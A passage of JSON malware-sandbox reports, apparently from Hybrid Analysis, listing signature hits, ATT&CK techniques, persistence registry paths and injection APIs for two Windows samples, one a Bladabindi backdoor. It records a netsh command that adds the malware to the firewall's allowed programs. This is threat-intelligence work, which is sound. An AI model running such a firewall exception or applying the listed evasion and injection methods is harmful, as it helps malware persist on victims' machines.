\"00000000-00004288.00000000.92877.00401000.00000020.mdmp\")\n Found reference to API \"Module32Next\" (Indicator: \"Module32Next\"; Source: \"00000000-00004288.00000000.92877.00401000.00000020.mdmp\")\n Found reference to API \"Module32FirstW\" (Indicator: \"Module32First\"; Source: \"00000000-00004288.00000000.92877.00401000.00000020.mdmp\")\n Found reference to API \"Module32NextW\" (Indicator: \"Module32Next\"; Source: \"00000000-00004288.00000000.92877.00401000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-427", "type": 2, "relevance": 1, "name": "Contains ability to retrieve a module handle (API string)", "description": "Found reference to API \"GetModuleHandleA\" (Indicator: \"GetModuleHandle\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API \"GetModuleHandleA\" (Indicator: \"GetModuleHandle\"; Source: \"00000000-00004288.00000000.92877.00401000.00000020.mdmp, 00000000-00004288.00000000.92883.0040A000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-205", "type": 2, "relevance": 1, "name": "Contains ability to retrieve the time elapsed since the system was started (API string)", "description": "Found reference to API \"GetTickCount\" (Indicator: \"GetTickCount\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API \"GetTickCount\" (Indicator: \"GetTickCount\"; Source: \"00000000-00004288.00000000.92883.0040A000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-317", "type": 2, "relevance": 1, "name": "Contains ability to retrieve address of exported function from a DLL (API string)", "description": "Found reference to API \"GetProcAddress\" (Indicator: \"GetProcAddress\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API \"GetProcAddress\" (Indicator: \"GetProcAddress\"; Source: \"00000000-00004288.00000000.92877.00401000.00000020.mdmp, 00000000-00004288.00000000.92877.01488000.00000004.mdmp, 00000000-00004288.00000000.92883.0040A000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-83", "type": 2, "relevance": 1, "name": "Contains ability to enumerate files on disk (API string)", "description": "Found reference to API \"FindFirstFileA\" (Indicator: \"FindFirstFile\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API \"FindFirstFileA\" (Indicator: \"FindFirstFile\"; Source: \"00000000-00004288.00000000.92883.0040A000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-313", "type": 2, "relevance": 1, "name": "Contains ability to enumerate system network resources (API string)", "description": "Found reference to API \"WNetOpenEnumA\" (Indicator: \"WNetOpenEnum\"; Source: \"00000000-00004288.00000000.92877.01488000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1135", "attck_id_wiki": "https://attack.mitre.org/techniques/T1135"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "static-88", "relevance": 1, "name": "Imports GetCommandLine API", "description": "Observed import api \"GetCommandLineA\" which can \"Retrieves the command-line string for the current process\" [Source: 07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1]", "origin": "Static Parser", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-3", "type": 2, "relevance": 3, "name": "Found potential URL in binary/memory", "description": "Heuristic match: \"nr.aq\"\n Heuristic match: \"{$t.gn\"\n Heuristic match: \"az.sc\"\n Heuristic match: \"$t.gn\"\n Heuristic match: \"ftp.server.com\"", "origin": "File/Memory", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-14", "type": 2, "name": "Found potential IP address in binary/memory", "description": "\"<IPv4>:1602\"\n \"<IPv4>:666\"\n \"<IPv4>:1337\"\n \"<IPv4>:1312\"", "origin": "File/Memory", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "stream-139", "type": 1, "name": "Contains XOR operation loops [Stream disassembly]", "description": "Assembly shows XOR instruction xor edi\n dword ptr [ebp-30h] in Stream UID: 00000000-00004288-37135-31-00405458\n Assembly shows XOR instruction xor dword ptr [ebp-30h]\n edi in Stream UID: 00000000-00004288-37135-31-00405458", "origin": "Hybrid Analysis Technology", "attck_id": "T1027.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/005"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "binary-71", "type": 8, "relevance": 1, "name": "Sample file has high entropy (likely encrypted/compressed content)", "description": "Sample file \"sample.bin\" has high entropy 7.675493612042937", "origin": "Binary File", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "summary-32", "type": 15, "relevance": 1, "name": "Shows ability to deobfuscate/decode files or information", "description": "The analysis shows use of encryption and can be used to decode file or information. Matched sigs: Contains XOR operation loops [Stream disassembly]", "origin": "Indicator Combinations", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "summary-28", "type": 15, "relevance": 1, "name": "Shows ability to obfuscate file or information", "description": "The analysis contains indicators for cyrpto or data obfuscation(base64/decrypt) which can hide information. Matched sigs: Contains CRYPTO related strings\n Matched sigs: Contains ability to use Cryptographic classes\n Matched sigs: Contains XOR operation loops [Stream disassembly]\n Matched sigs: Sample file has high entropy (likely encrypted/compressed content)", "origin": "Indicator Combinations", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "summary-31", "type": 15, "relevance": 1, "name": "Shows ability to use encryption for command and control traffic", "description": "The analysis shows use of encryption\n use of http/https that can be used to send encrypted data on command and control server. Matched sigs: Contains XOR operation loops [Stream disassembly]\n Matched sigs: Found potential URL in binary/memory\n Matched sigs: Found potential IP address in binary/memory", "origin": "Indicator Combinations", "attck_id": "T1573.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/001"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "string-426", "type": 2, "relevance": 1, "name": "Contains ability to modify file attributes (API string)", "description": "Found reference to API \"SetFileAttributesA\" (Indicator: \"SetFileAttributes\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API \"SetFileAttributesA\" (Indicator: \"SetFileAttributes\"; Source: \"00000000-00004288.00000000.92883.0040A000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1222", "attck_id_wiki": "https://attack.mitre.org/techniques/T1222"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "string-316", "type": 2, "relevance": 1, "name": "Contains ability to terminate a process (API string)", "description": "Found reference to API \"ExitProcess\" (Indicator: \"ExitProcess\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API \"ExitProcess\" (Indicator: \"ExitProcess\"; Source: \"00000000-00004288.00000000.92883.0040A000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "string-230", "type": 2, "relevance": 1, "name": "Contains ability to delete registry key/value (API string)", "description": "Found reference to API \"RegDeleteKeyA\" (Indicator: \"RegDeleteKey\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API \"RegDeleteKeyA\" (Indicator: \"RegDeleteKey\"; Source: \"00000000-00004288.00000000.92883.0040A000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "string-535", "type": 2, "name": "Contains ability to write files (API string)", "description": "Found reference to API \"WriteFile\" (Indicator: \"WriteFile\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API \"WriteFile\" (Indicator: \"WriteFile\"; Source: \"00000000-00004288.00000000.92883.0040A000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "string-308", "type": 2, "relevance": 1, "name": "Contains ability to delete files/directories (API string)", "description": "Found reference to API \"DeleteFileA\" (Indicator: \"DeleteFile\"; File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found reference to API \"DeleteFileA\" (Indicator: \"DeleteFile\"; Source: \"00000000-00004288.00000000.92877.00401000.00000020.mdmp, 00000000-00004288.00000000.92883.0040A000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "General", "identifier": "static-92", "relevance": 5, "name": "PE file has unusual entropy resources", "description": "\"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\" has resource with unusual entropy \"RT_RCDATA:7.6665560394\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Pattern Matching", "identifier": "yara-52", "type": 13, "relevance": 5, "name": "YARA signature match - References common sandbox DLLs (sandbox evasion)", "description": "YARA signature for common sandbox DLLs that are used for anti-sandbox techniques matched on process \"00000000-00004288\"\n YARA signature for common sandbox DLLs that are used for anti-sandbox techniques matched on file \"sample.bin\"", "origin": "YARA Signature", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "static-60", "relevance": 10, "name": "PE file contains unusual section name", "description": "\"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\" has a section named \"CODE\"\n \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\" has a section named \"DATA\"\n \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\" has a section named \"BSS\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "string-64", "type": 2, "relevance": 10, "name": "Input file contains API references not part of its Import Address Table (IAT)", "description": "Found string \"Sleep\" (Source: 07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1, API is part of module: KERNELBASE.DLL)\n Found string \"CreateToolhelp32Snapshot\" (Source: 07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1, API is part of module: KERNEL32.DLL)\n Found string \"Heap32ListFirst\" (Source: 07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1, API is part of module: KERNEL32.DLL)\n Found string \"Heap32ListNext\" (Source: 07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1, API is part of module: KERNEL32.DLL)\n Found string \"Heap32First\" (Source: 07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1, API is part of module: KERNEL32.DLL)\n Found string \"Heap32Next\" (Source: 07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1, API is part of module: KERNEL32.DLL)\n Found string \"Toolhelp32ReadProcessMemory\" (Source: 07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1, API is part of module: KERNEL32.DLL)\n Found string \"Process32First\" (Source: 07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1, API is part of module: KERNEL32.DLL)\n Found string \"Process32Next\" (Source: 07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1, API is part of module: KERNEL32.DLL)\n Found string \"Process32FirstW\" (Source: 07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1, API is part of module: KERNEL32.DLL)\n Found string \"Process32NextW\" (Source: 07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1, API is part of module: KERNEL32.DLL)\n Found string \"Thread32First\" (Source: 07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1, API is part of module: KERNEL32.DLL)\n Found string \"Thread32Next\" (Source: 07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1, API is part of module: KERNEL32.DLL)\n Found string \"Module32First\" (Source: 07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1, API is part of module: KERNEL32.DLL)\n Found string \"Module32Next\" (Source: 07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1, API is part of module: KERNEL32.DLL)\n Found string \"Module32FirstW\" (Source: 07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1, API is part of module: KERNEL32.DLL)\n Found string \"Module32NextW\" (Source: 07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1, API is part of module: KERNEL32.DLL)\n Found string \"ShellExecuteA\" (Source: 07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1, API is part of module: SHELL32.DLL)\n Found string \"GetSystemDirectoryA\" (Source: 07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1, API is part of module: KERNELBASE.DLL)\n Found string \"GetWindowsDirectoryA\" (Source: 07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1, API is part of module: KERNELBASE.DLL)\n Found string \"GetTempPathA\" (Source: 07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1, API is part of module: KERNEL32.DLL)\n Found string \"IsDebuggerPresent\" (Source: 07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1, API is part of module: KERNELBASE.DLL)", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "static-1", "relevance": 1, "name": "Imports suspicious APIs", "description": "RegDeleteKeyA\n RegCloseKey\n GetUserNameA\n RegCreateKeyExA\n RegOpenKeyExA\n RegCreateKeyA\n WriteProcessMemory\n VirtualAllocEx\n GetFileAttributesA\n CopyFileA\n VirtualProtect\n GetModuleFileNameA\n LoadLibraryA\n CreateRemoteThread\n GetStartupInfoA\n OpenProcess\n LockResource\n CreateDirectoryA\n DeleteFileA\n UnhandledExceptionFilter\n ReadProcessMemory\n GetCommandLineA\n GetProcAddress\n GetModuleHandleA\n WriteFile\n FindFirstFileA\n CreateProcessA\n CreateFileA\n GetTickCount\n FindResourceA\n VirtualAlloc\n GetWindowThreadProcessId\n FindWindowA", "origin": "Static Parser", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "string-184", "type": 2, "relevance": 5, "name": "Found registry location strings which can modify auto-execute functionality", "description": "Found string \"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders\" (Indicator: \"software\\microsoft\\windows\\currentversion\\explorer\\shell folders\"; in File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found string \"Software\\Microsoft\\Active Setup\\Installed Components\\\" (Indicator: \"software\\microsoft\\active setup\\installed components\"; in File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found string \"Software\\Microsoft\\Windows\\CurrentVersion\\Run\" (Indicator: \"software\\microsoft\\windows\\currentversion\\run\"; in File: \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\")\n Found string \"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders\" (Indicator: \"software\\microsoft\\windows\\currentversion\\explorer\\shell folders\"; in Source: \"00000000-00004288.00000000.92877.00401000.00000020.mdmp\")\n Found string \"Software\\Microsoft\\Active Setup\\Installed Components\\\" (Indicator: \"software\\microsoft\\active setup\\installed components\"; in Source: \"00000000-00004288.00000000.92877.00401000.00000020.mdmp\")\n Found string \"Software\\Microsoft\\Windows\\CurrentVersion\\Run\" (Indicator: \"software\\microsoft\\windows\\currentversion\\run\"; in Source: \"00000000-00004288.00000000.92877.00401000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "string-4", "type": 2, "relevance": 4, "name": "Found a string that may be used as part of an injection method", "description": "\"shell_traywnd\" (Taskbar window class may be used to inject into explorer with the SetWindowLong method) in Source: 07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\n \"Shell_TrayWnd\" (Taskbar window class may be used to inject into explorer with the SetWindowLong method) in Source: 07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\n \"shell_traywnd\" (Taskbar window class may be used to inject into explorer with the SetWindowLong method) in Source: 00000000-00004288.00000000.92877.00401000.00000020.mdmp\n \"Shell_TrayWnd\" (Taskbar window class may be used to inject into explorer with the SetWindowLong method) in Source: 00000000-00004288.00000000.92877.00401000.00000020.mdmp", "origin": "File/Memory", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "stream-34", "type": 1, "relevance": 8, "name": "Contains ability to write to a remote process", "description": "WriteProcessMemory@KERNEL32.DLL at 00000000-00004288-37135-2-0040568C\n WriteProcessMemory@KERNEL32.DLL at 00000000-00004288-37135-45-00404D84\n WriteProcessMemory@KERNEL32.DLL at 00000000-00004288-37135-29-00404E14", "origin": "Hybrid Analysis Technology", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "stream-5", "type": 1, "relevance": 8, "name": "Contains ability to create a remote thread (often used for process injection)", "description": "CreateRemoteThread@KERNEL32.DLL at 00000000-00004288-37135-28-00404E44", "origin": "Hybrid Analysis Technology", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-6", "relevance": 1, "name": "Section contains high entropy", "description": "\"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\" has section name CODE with entropy \"6.46347820662\"\n \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\" has section name .reloc with entropy \"6.22627408059\"\n \"07325c3843d26c9d43e9cb4d41ed3f0c24d9b5aaf4e3a27067ea481504343ba1\" has section name .rsrc with entropy \"7.66903398432\"", "origin": "Static Parser", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Environment Awareness", "identifier": "stream-121", "type": 1, "relevance": 5, "name": "Contains ability to retrieve a module handle", "description": "GetModuleHandleA@KERNEL32.DLL at 00000000-00004288-37135-60-00404EEC\n GetModuleHandleA@KERNEL32.DLL at 00000000-00004288-37135-44-00404FF0", "origin": "Hybrid Analysis Technology", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Security", "identifier": "stream-88", "type": 1, "relevance": 1, "name": "Contains ability to terminate a process", "description": "ExitProcess@KERNEL32.DLL at 00000000-00004288-37135-15-00403658", "origin": "Hybrid Analysis Technology", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Remote Access Related", "identifier": "string-30", "type": 2, "relevance": 3, "name": "Contains references to WMI/WMIC", "description": "Found string \"(\"winmgmts:\\\\lbJ\" (Indicator: \"winmgmts:\"; in Source: \"00000000-00004288.00000000.92877.01488000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1047", "attck_id_wiki": "https://attack.mitre.org/techniques/T1047"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Environment Awareness", "identifier": "binary-8", "type": 8, "relevance": 5, "name": "The input sample contains a known anti-VM trick", "description": "Found VM detection artifact \"VMware trick\" in \"sample.bin\" (Offset: 27834)", "origin": "Binary File", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}
be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a
https://hybrid-analysis.com/sample/be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a
Hybrid Analysis - Infostealers
{"size": 95244, "type": "PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows", "submit_name": "be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a", "sha256": "be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a", "av_detect": 89, "vx_family": "Trojan[Backdoor]/MSIL.Bladabindi", "threat_score": 100, "threat_level": 2, "verdict": "malicious", "certificates_validation_message": "No signature was present in the subject. (0x800b0100)", "total_network_connections": 1, "total_processes": 2, "total_signatures": 164, "extracted_files": [{"name": "app", "file_path": "%APPDATA%\\app", "file_size": 4, "sha256": "d3d1d98df443947ab0b52378acbb5f5c21593677b45f0403b3831c93d8be7fca", "type_tags": ["text"], "description": "Unicode text, UTF-8 (with BOM) text, with no line terminators", "runtime_process": "be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe (PID: 5756)", "threat_level_readable": "no specific threat", "file_available_to_download": true}], "processes": [{"uid": "00000000-00005756", "name": "be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe", "normalized_path": "C:\\be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe", "sha256": "be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a"}, {"uid": "00000000-00005928", "parentuid": "00000000-00005756", "name": "netsh.exe", "normalized_path": "%WINDIR%\\system32\\netsh.exe", "command_line": "netsh firewall add allowedprogram \"C:\\be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" ENABLE", "sha256": "661f5d4ce4f0a6cb32669a43ce5deec6d5a9e19b2387f22c5012405e92169943"}], "mitre_attcks": [{"tactic": "Initial Access", "technique": "Replication Through Removable Media", "attck_id": "T1091", "attck_id_wiki": "https://attack.mitre.org/techniques/T1091", "suspicious_identifiers_count": 1}, {"tactic": "Execution", "technique": "Windows Management Instrumentation", "attck_id": "T1047", "attck_id_wiki": "https://attack.mitre.org/techniques/T1047", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "suspicious_identifiers_count": 1, "informative_identifiers_count": 7}, {"tactic": "Execution", "technique": "Windows Command Shell", "attck_id": "T1059.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/003", "informative_identifiers_count": 1, "parent": {"technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059"}}, {"tactic": "Execution", "technique": "Scheduled Task", "attck_id": "T1053.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1053/005", "suspicious_identifiers_count": 1, "parent": {"technique": "Scheduled Task/Job", "attck_id": "T1053", "attck_id_wiki": "https://attack.mitre.org/techniques/T1053"}}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 5}, {"tactic": "Execution", "technique": "Inter-Process Communication", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559", "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Account Manipulation", "attck_id": "T1098", "attck_id_wiki": "https://attack.mitre.org/techniques/T1098", "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 1, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Persistence", "technique": "Scheduled Task", "attck_id": "T1053.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1053/005", "suspicious_identifiers_count": 1, "parent": {"technique": "Scheduled Task/Job", "attck_id": "T1053", "attck_id_wiki": "https://attack.mitre.org/techniques/T1053"}}, {"tactic": "Persistence", "technique": "Path Interception by PATH Environment Variable", "attck_id": "T1574.007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/007", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Persistence", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 1}, {"tactic": "Persistence", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Account Manipulation", "attck_id": "T1098", "attck_id_wiki": "https://attack.mitre.org/techniques/T1098", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 1, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Privilege Escalation", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Scheduled Task", "attck_id": "T1053.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1053/005", "suspicious_identifiers_count": 1, "parent": {"technique": "Scheduled Task/Job", "attck_id": "T1053", "attck_id_wiki": "https://attack.mitre.org/techniques/T1053"}}, {"tactic": "Privilege Escalation", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "Path Interception by PATH Environment Variable", "attck_id": "T1574.007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/007", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": 